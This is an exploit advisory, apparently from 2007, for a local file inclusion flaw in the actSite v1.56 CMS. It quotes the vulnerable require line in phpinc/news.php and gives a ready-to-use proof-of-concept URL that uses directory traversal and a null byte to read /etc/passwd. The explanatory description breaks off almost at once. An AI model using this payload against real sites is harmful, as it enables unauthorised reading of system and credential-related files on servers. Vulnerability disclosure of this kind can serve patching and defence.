:: #'#/
(-.-)
-----------------oOO---(_)---OOo-----------------
| actSite v1.56 (news.php) Local File Inclusion |
| coded by DNX |
-------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: in phpinc/news.php line 101
require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";
[!] PoC:
- http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00
[!] Description:
- So why we can inject code in a post variable per url? Let's do some research...
...